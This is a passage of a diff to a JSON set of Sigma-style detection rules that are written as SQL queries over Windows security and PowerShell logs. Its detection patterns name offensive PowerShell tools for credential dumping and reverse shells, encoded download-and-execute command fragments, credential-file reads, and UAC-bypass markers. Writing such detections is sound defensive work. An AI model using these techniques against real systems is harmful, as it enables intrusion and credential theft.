cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1027", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the 
\"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.reconnaissance", "attack.discovery", - "attack.impact" + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": 
"posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo 
LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "A General detection for the 
